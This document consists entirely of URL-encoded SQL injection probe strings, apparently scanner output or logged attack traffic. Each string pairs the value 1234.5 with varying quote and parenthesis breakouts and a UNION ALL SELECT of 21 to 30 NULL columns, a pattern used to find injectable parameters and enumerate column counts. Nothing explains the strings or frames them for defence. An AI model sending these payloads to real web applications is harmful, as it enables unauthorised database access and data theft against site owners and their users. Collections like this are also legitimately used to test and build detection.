1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 